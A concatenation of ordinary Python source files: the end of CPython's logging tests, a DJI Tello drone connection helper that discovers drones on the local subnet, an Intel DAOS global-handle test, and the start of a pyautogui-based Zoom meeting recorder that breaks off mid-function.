logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist")
self.rmfiles.append(filename)
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".1")
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".2")
self.assertFalse(os.path.exists(self.fn + ".3"))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# test methods added below
pass
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
import time
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
FormatterTest,
LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest,
RotatingFileHandlerTest,
LastResortTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
|
tool.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import traceback
import netifaces
import netaddr
from netaddr import IPNetwork
import socket
import queue
import threading
from . import logger
def get_func_name():
"""
Get the name of the calling function
:return: calling-function`s name
"""
return traceback.extract_stack()[-2][2]
def get_robots_sn(robots_list):
"""
Get the sn for the robots_list,
:param robots_list: which robots need to get sn
:return: robots_sn_dict = {sn:robot_obj, ...}
"""
robots_sn_dict = {}
for robot_obj in robots_list:
sn = robot_obj.get_sn()
robots_sn_dict[sn] = robot_obj
return robots_sn_dict
def check_robot_id(robot_id, robots_dict):
"""
check to see if the robot id exists
:param robot_id:
:param robots_dict: the dict to search
:return:
"""
return robot_id in list(robots_dict.keys())
def check_robots_id(robots_id_list, robots_dict):
"""
check to see if the robots id in input list exist
:param robots_id_list:
:param robots_dict: the dict to search
:return: False, robot_id : robot_id do not exists
:return: True, robot_id : all robots id exist
"""
for robot_id in robots_id_list:
if not check_robot_id(robot_id, robots_dict):
return False, robot_id
return True, -1
def check_group_host(robot_group_host_list):
if len(robot_group_host_list) == 0:
logger.warning("‘run’ obj should have at least 1 param to run")
return True
total_lenth = 0
_first_set = set(robot_group_host_list[0])
for robot_group_host in robot_group_host_list:
_first_set = _first_set.union(set(robot_group_host))
total_lenth += len(robot_group_host)
return len(_first_set) == total_lenth
def get_subnets():
"""
Look through the machine's internet connection and
returns subnet addresses and server ip
:return: list[str]: subnets
list[str]: addr_list
"""
subnets = []
ifaces = netifaces.interfaces()
addr_list = []
for myiface in ifaces:
addrs = netifaces.ifaddresses(myiface)
if socket.AF_INET not in addrs:
continue
# Get ipv4 stuff
ipinfo = addrs[socket.AF_INET][0]
address = ipinfo['addr']
netmask = ipinfo['netmask']
# limit range of search. This will work for router subnets
if netmask != '255.255.255.0':
continue
# Create ip object and get
cidr = netaddr.IPNetwork('%s/%s' % (address, netmask))
network = cidr.network
subnets.append((network, netmask))
addr_list.append(address)
return subnets, addr_list
class TelloProtocol(object):
def __init__(self, text=None, host=None, encoding='utf-8'):
self._text = text
self._host = host
self.encoding = encoding
self.init()
def init(self):
if self._text is None:
logger.warning("Connection: recv buff None.")
return
if isinstance(self._text, bytes):
if self._text == 204 or self._text == 255:
logger.warning("decode_msg: recv invalid data, buff {0}".format(self._text))
# drone has bug that reply error data 0xcc,43907 has bug that reply error data 0xff
self._text = None
return
else:
self._text = self._decode()
elif isinstance(self._text, str):
self._text = self._encode()
@property
def text(self):
return self._text
@property
def host(self):
return self._host
@host.setter
def host(self, value):
self._host = value
@text.setter
def text(self, value):
self._text = value
def _encode(self):
return self._text.encode(self.encoding)
def _decode(self):
return self._text.decode(self.encoding)
class TelloConnection(object):
def __init__(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=8889):
self.local_ip = local_ip
self.local_port = local_port
self._sock = None
self.client_recieve_thread_flag = False # for client recieve
self._robot_host_list = [] # for scan robot
def start(self):
try:
local_addr = (self.local_ip, self.local_port)
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for sending cmd
self._sock.bind(local_addr)
except Exception as e:
logger.warning("udpConnection: create, host_addr:{0}, exception:{1}".format(self.local_ip, e))
raise
def pre_close(self):
if len(self._robot_host_list) > 0:
for host in self._robot_host_list:
self.send(TelloProtocol("command", host))
else:
logger.warning("no exit host")
def close(self):
if self._sock:
self.pre_close() # send command to shut down recv
time.sleep(1)
self._sock.close()
def recv(self):
try:
if self._sock:
data, host = self._sock.recvfrom(2048)
else:
raise Exception("socket used before assign")
except Exception as e:
logger.warning("Connection: recv, exception:{0}".format(e))
raise
proto = TelloProtocol(data, host)
return proto
def send(self, proto):
try:
if self._sock:
self._sock.sendto(proto.text, proto.host)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
def _scan_host(self, num):
"""Find avaliable ip list in server's subnets
:param num: Number of Tello this method is expected to find
:return: None
"""
logger.info('[Start_Searching]Searching for %s available Tello...\n' % num)
subnets, address = get_subnets()
possible_addr = []
for subnet, netmask in subnets:
for ip in IPNetwork('%s/%s' % (subnet, netmask)):
# skip local and broadcast
if str(ip).split('.')[3] == '0' or str(ip).split('.')[3] == '255':
continue
possible_addr.append(str(ip))
while len(self._robot_host_list) < num:
logger.info('[Still_Searching]Trying to find Tello in subnets...\n')
# delete already fond Tello ip
for tello_host in self._robot_host_list:
if tello_host[0] in possible_addr:
possible_addr.remove(tello_host[0])
# skip server itself
for ip in possible_addr:
if ip in address:
continue
self._sock.sendto(b'command', (ip, self.local_port))
if len(self._robot_host_list) >= num:
break
return self._robot_host_list
def scan_multi_robot(self, num=0):
""" Automatic scanning of robots in the network
:param num:
:return:
"""
receive_thread = threading.Thread(target=self._scan_receive_task, args=(num, ), daemon=True)
receive_thread.start()
robot_host_list = self._scan_host(num)
receive_thread.join()
return robot_host_list
def _scan_receive_task(self, num):
"""Listen to responses from the Tello when scan the devices.
:param:num:
"""
while len(self._robot_host_list) < num:
try:
resp, ip = self._sock.recvfrom(1024)
logger.info("FoundTello: from ip {1}_receive_task, recv msg: {0}".format(resp, ip))
ip = ''.join(str(ip[0]))
if resp.upper() == b'OK' and ip not in self._robot_host_list:
logger.info('FoundTello: Found Tello.The Tello ip is:%s\n' % ip)
self._robot_host_list.append((ip, self.local_port))
except socket.error as exc:
logger.error("[Exception_Error]Caught exception socket.error : {0}\n".format(exc))
self.client_recieve_thread_flag = True
logger.info("FoundTello: has finished, _scan_receive_task quit!")
class TelloClient(object):
def __init__(self):
self._conn = TelloConnection()
self.queue = queue.Queue()
self.receive_thread = threading.Thread(target=self.recv, daemon=True)
self.receive_thread_flag = True
def start(self):
self._conn.start()
self.receive_thread.start()
def close(self):
self.receive_thread_flag = False
self._conn.client_recieve_thread_flag = True
if self._conn:
self._conn.close()
self.receive_thread.join(10)
def recv(self):
while not self._conn.client_recieve_thread_flag:
pass
logger.info("recv thread start!")
while self.receive_thread_flag:
proto = self._conn.recv()
self.queue.put(proto)
logger.info("recv thread quit!")
def send(self, proto):
self._conn.send(proto)
def scan_multi_robot(self, num):
return self._conn.scan_multi_robot(num)
class TelloStatus(object):
FLIGHT_ACTION_SET = {"error", "ok", 'out of range', "error No valid marker", "error Not joystick",
"error Auto Land", "error No valid imu", "error, high temp", "error Motor stop"}
EXT_ACTION_SET = {"led ok", "matrix ok", 'unknow command: led', "unknow command: mled", "command error: 254"}
def __init__(self, cur_action):
self.cur_action = cur_action
@staticmethod
def judge(proto):
data = proto.text
host = proto.host
if data is None:
if host is None:
logger.waring("socket closed")
else:
_last_two_words = data.strip()[-2:]
if _last_two_words != "ok":
# judge reply contains ok or battery
try:
float(_last_two_words) # battery obj
except ValueError:
logger.warning("reply false: {}".format(data))
else:
logger.debug("DRONE reply:{}".format(data))
class TelloThread(threading.Thread):
def __init__(self, target, *args, **kwargs):
threading.Thread.__init__(self)
self.args = args
self.kw = kwargs
self.result = None
self.target = target
def run(self):
self.result = self.target(*self.args, **self.kw)
def get_result(self):
try:
return self.result
except Exception:
return None
|
GlobalHandle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
import ctypes
import os
import time
import traceback
import sys
import json
from multiprocessing import Process, sharedctypes
from avocado import Test
sys.path.append('./util')
sys.path.append('../util')
sys.path.append('../../../utils/py')
sys.path.append('./../../utils/py')
import ServerUtils
import WriteHostFile
import CheckForPool
import daos_api
import daos_cref
from daos_api import DaosContext
from daos_api import DaosPool
from daos_api import DaosContainer
from daos_cref import *
def CheckHandle(pool_glob_handle, uuidstr, cont_glob_handle, rank):
"""
This gets run in a child process and verifyes the global
handles can be turned into local handles in another process.
"""
try:
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
build_paths = json.load(f)
# setup the DAOS python API in this process
context = DaosContext(build_paths['PREFIX'] + '/lib/')
# setup the pool and connect using global handle
pool = DaosPool(context)
pool.uuid = uuidstr
pool.set_svc(rank)
pool.group = "daos_server"
buf = ctypes.cast(pool_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte * pool_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
pool_handle = pool.global2local(context,
pool_glob_handle.iov_len,
pool_glob_handle.iov_buf_len,
buf2)
# perform an operation that will use the new handle, if it
# doesn't throw an exception, then all is well.
pool.pool_query()
# setup the container and then connect using the global handle
container = DaosContainer(context)
container.poh = pool_handle
buf = ctypes.cast(cont_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
cont_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
cont_handle = container.global2local(context,
cont_glob_handle.iov_len,
cont_glob_handle.iov_buf_len,
buf2)
# just try one thing to make sure handle is good
container.query()
except ValueError as e:
print(e)
print(traceback.format_exc())
raise
return
class GlobalHandle(Test):
"""
This class contains tests to verify the ability to share container
handles amoung processes.
"""
def setUp(self):
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
self.build_paths = json.load(f)
# setup the DAOS python API
self.Context = DaosContext(self.build_paths['PREFIX'] + '/lib/')
server_group = self.params.get("server_group",'/server/',
'daos_server')
basepath = os.path.normpath(self.build_paths['PREFIX'] + "/../")
tmp = self.build_paths['PREFIX'] + '/tmp'
self.hostlist = self.params.get("test_machines",'/run/hosts/')
self.hostfile = WriteHostFile.WriteHostFile(self.hostlist, tmp)
ServerUtils.runServer(self.hostfile, server_group, basepath)
time.sleep(2)
def tearDown(self):
ServerUtils.stopServer()
os.remove(self.hostfile)
# really make sure everything is gone
CheckForPool.CleanupPools(self.hostlist)
ServerUtils.killServer(self.hostlist)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=container,conthandle,vm,small,regression
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode",'/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size",'/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
pool = DaosPool(self.Context)
pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
pool.connect(1 << 1)
# create a pool global handle
iov_len, buf_len, buf = pool.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_pool_handle = sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len,
iov_len)
# create a container
container = DaosContainer(self.Context)
container.create(pool.handle)
container.open()
# create a container global handle
iov_len, buf_len, buf = container.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_cont_handle = sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len,
iov_len)
sct_pool_uuid = sharedctypes.RawArray(ctypes.c_byte, pool.uuid)
# this should work in the future but need on-line server addition
#arg_list = (
#p = Process(target=CheckHandle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
CheckHandle(sct_pool_handle, sct_pool_uuid, sct_cont_handle, 0)
except ValueError as e:
print(e)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
zoomrec.py
|
import csv
import logging
import os
import psutil
import pyautogui
import random
import schedule
import signal
import subprocess
import threading
import time
import atexit
from datetime import datetime, timedelta
import requests
global ONGOING_MEETING
global VIDEO_PANEL_HIDED
global TELEGRAM_TOKEN
global TELEGRAM_RETRIES
global TELEGRAM_CHAT_ID
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
# Turn DEBUG on:
# - screenshot on error
# - record joining
# - do not exit container on error
DEBUG = True if os.getenv('DEBUG') == 'True' else False
# Disable failsafe
pyautogui.FAILSAFE = False
# Get vars
BASE_PATH = os.getenv('HOME')
CSV_PATH = os.path.join(BASE_PATH, "meetings.csv")
IMG_PATH = os.path.join(BASE_PATH, "img")
REC_PATH = os.path.join(BASE_PATH, "recordings")
DEBUG_PATH = os.path.join(REC_PATH, "screenshots")
# Add your Telegram token and chat id here
TELEGRAM_TOKEN = os.getenv('TELEGRAM_BOT_TOKEN')
TELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')
TELEGRAM_RETRIES = 5
# Change name that is displayed inside Zoom meeting
DISPLAY_NAME = "Dieter Gaber"
TIME_FORMAT = "%Y-%m-%d_%H-%M-%S"
CSV_DELIMITER = ';'
ONGOING_MEETING = False
VIDEO_PANEL_HIDED = False
class BackgroundThread:
def __init__(self, interval=10):
# Sleep interval between
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global ONGOING_MEETING
ONGOING_MEETING = True
logging.debug("Check continuously if meeting has ended..")
while ONGOING_MEETING:
# Check if recording
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'warn_meeting_recording.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'accept_recording.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if ended
if (pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'meeting_ended_by_host_1.png'),
confidence=0.9) is not None or pyautogui.locateOnScreen(
os.path.join(IMG_PATH, 'meeting_ended_by_host_2.png'), confidence=0.9) is not None):
ONGOING_MEETING = False
logging.info("Meeting ended by host..")
time.sleep(self.interval)
class HideViewOptionsThread:
def __init__(self, interval=10):
# Sleep interval between
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global VIDEO_PANEL_HIDED
logging.debug("Check continuously if screensharing is active..")
while ONGOING_MEETING:
# Check if host is sharing poll results
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'),
confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Check if view options available
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'view_options.png'), confidence=0.9) is not None:
if not VIDEO_PANEL_HIDED:
logging.info("Screensharing active..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
time.sleep(1)
# Hide video panel
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'show_video_panel.png'),
confidence=0.9) is not None:
# Leave 'Show video panel' and move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
VIDEO_PANEL_HIDED = True
else:
try:
